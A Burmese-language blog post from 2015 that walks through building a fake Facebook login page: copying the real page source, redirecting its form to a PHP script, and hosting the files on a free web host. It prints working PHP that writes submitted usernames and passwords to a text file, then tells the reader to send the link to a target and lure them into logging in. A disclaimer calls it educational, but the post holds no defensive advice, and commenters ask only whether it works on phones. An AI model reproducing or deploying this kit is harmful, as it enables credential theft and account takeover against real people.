Monday, July 13, 2015

Facebook Hacking Using Phishing

ဒီပို့စ်လေးနဲ့ပတ်သက်ပြီး ပြောချင်တာတစ်ခုရှိပါတယ်။အဲ့ဒါကတော့ ကျွန်တော်က ဟတ်ကာတစ်ယောက်မဟုတ်ပါဘူး။ကိုယ်သိထားတာလေးတွေ ၊ ကိုယ်တက်ထားတာလေးတွေ ၊ ကိုယ်လေ့လာဖြစ်တာလေးတွေ ၊ ကိုယ်အသုံးပြုလို့ကောင်းတာလေးတွေကို ပြန်လည်မျှဝေချင်တဲ့ လူငယ်တစ်ယောက်ပါ။တကယ်တော့ Hacking ဆိုတာ Game တစ်ခုလိုပါဘဲ။ အရမ်းစိတ်ဝင်စားစရာကောင်းပါတယ်။ဝါသနာပါတဲ့သူတွေအတွက်တော့ နေ့တွေ ညတွေပါ ပျောက်သွားအောင် စွဲဆောင်တဲ့ နည်းပညာတစ်ခုပါ။အခု ကျွန်တော်ပြောမယ့် Phishing နည်းပညာလေးကတော့ Hacker တစ်ယောက်ရဲ့ ခြေလှမ်းအစလို့ပြောလို့ရပါတယ်။ဟတ်ကင်း ကို ဝါသနာပါတဲ့လူငယ်တစ်ယောက် ဟတ်ကင်းလောကထဲရောက်လာပြီဆို အရင်ဆုံးဟတ်ဖြစ်ကြတဲ့နည်းက Web Page အတုလုပ်ပြီး အခြားသူရဲ့ လျှို့ဝှက်နံဘက် ကို ရယူတဲ့ နည်းလမ်းလေးပါ။သူ့ကို PHISHING လို့ခေါ်ပါတယ်။ကျွန်တော် ဒီပို့စ်ကိုရေးလိုက်တာဟာ စာဖတ်သူတို့ကို သူများအကောင့်တွေလိုက်ဟတ်ဖို့ ၊ နည်းပညာလေ့လာမှုအားနည်းတဲ့ Internet User တွေကို နည်းပညာသုံးပြီးတိုက်ခိုက်နိုင်ဖို့ သင်ပြပေးတာမဟုတ်ပါဘူး။လေ့လာဖို့သက်သက်နဲ့ ဘယ်လိုကာကွယ်နိုင်မလဲဆိုတာကို တွေးခေါ်နိုင်ဖို့အတွက် နည်းပညာတစ်ခုအနေနဲ့သာ ရေးသားပေးခြင်းဖြစ်ပါတယ်။

ဒီနည်းကိုသုံးပြီးတော့ တခြားသူရဲ့အကောင့်တွေကိုလိုက်ပြီးမတိုက်ခိုက်ဖို့ ကျွန်တော် အနူးညွှန့်တောင်းဆိုပါရစေ။

 အခု ဥပမာအနေနဲ့ Facebook Login စာမျက်နှာအတုလုပ်ပုံလုပ်နည်းကို ရှင်းပြပေးပါမယ်။အဲ့တော့ Facebook Login စာမျက်နှာကိုတည်ဆောက်ထားတဲ့ Code တွေကိုယူဖို့ www.facebook.com ကိုသွားလိုက်ပါ။ပြီးရင် Right Click နှိပ်ပြီး View page source ကို ကလစ်လိုက်ပါ။ကျလာတဲ့ ကုဒ်တွေအကုန်လုံးကို Notepad ထဲ Copy ကူးထည့်လိုက်ပါ။ပြီးရင် Ctrl + F အကူအညီနဲ့ action ဆိုတာလေးကို ရှာပါ။တွေ့ပြီဆိုရင် သူ့ဘေးက www.facebook.com/login.php?login_attempt=1 ဆိုတဲ့နေရာမှာ login.phpလို့ ပြောင်းပြီး index.html ဆိုတဲ့ နာမည်နဲ့ Save လုပ်လိုက်ပါ။ 

 နောက်ထပ် Notepad တစ်ခု ထပ်ဖွင့်ထားပါ။ ပြီးရင် ကျွန်တော် အောက်မှာပေးထားတဲ့ ကုဒ်တွေကို Notepad ထဲ Copy ကူးထည့်ပြီး login.php ဆိုတဲ့နာမည်နဲ့ Save လိုက်ပါ။ 

<?php
header("Location: http://www.facebook.com");
$handle = fopen("pswrd.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

နောက်ထပ် Notepad တစ်ခုဖွင့်ပြီး ဘာမှမရေးဘဲ pswrd.txt နာမည်နဲ့ Save လိုက်ပါ။ အခုဆိုရင် ကျွန်တော်တို့ တစ်ခုပြီးတစ်ခု တည်ဆောက်လာတာ index.html ၊ login.php ၊ pswrd.txt ဆိုပြီး ဖိုင်သုံးခုရသွားပါပြီ။ အဲ့ဒါကို ကျွန်တော်တို့ Free hosting site တစ်ခုခုမှာ Upload တင်ရပါမယ်။အဲ့တော့ မိမိကြိုက်နှစ်သက်ရာ Free hosting site တစ်ခုခုကို သွားလိုက်ပါ။ ကျွန်တော်ကတော့http://www.000webhost.comကိုသွားပါတယ်။အကောင့်မရှိသေးရင် ဖွင့်လိုက်ပါ။အကောင့်ရသွားပြီဆိုရင် File manager ကိုဝင်ပြီး စောစောက ကျွန်တော်တို့တည်ဆောက်ထားတဲ့ ဖိုင်သုံးခုကို Upload တင်လိုက်ပါ။ပြီးသွားရင်တော့ ကိုယ့်ဟတ်မယ့်သူဆီ အဲ့ဒီလင့်လေး ပို့ပြီး Login ဝင်လာအောင် စွဲဆောင်ပါ။ သူဝင်လိုက်တယ်ဆိုရင်တော့ မိမိ ဆောက်ထားတဲ့ pswrd.txt ဆိုတဲ့ ဖိုင်လေးထဲကို User name နဲ့ password ရောက်လာပါလိမ့်မယ်။ဒါဆိုရင် ကျွန်တော်တို့ Facebook Login Page လုပ်ပြီး ဟတ်တဲ့နည်းလေး ပြီးသွားပါပြီ။ကိုယ့်အကောင့်နဲ့ကိုယ့်ဘာသာကိုပြန်စမ်းကြည့်ကြပါ။နည်းပညာတွေလေ့လာရင် ပျော်ရွှင်ကြပါစေခဗျာ ...

MAUBINTHARLAY

2 comments:

Unknown said...

Computer မှာပဲရတာလား ဖုန်းမှာ​ရောရလား

Unknown said...

ဒီနည်းလမ်းက ဖုန်းမှာသုံးလိုရလား
ပြောပြပါ ​နော်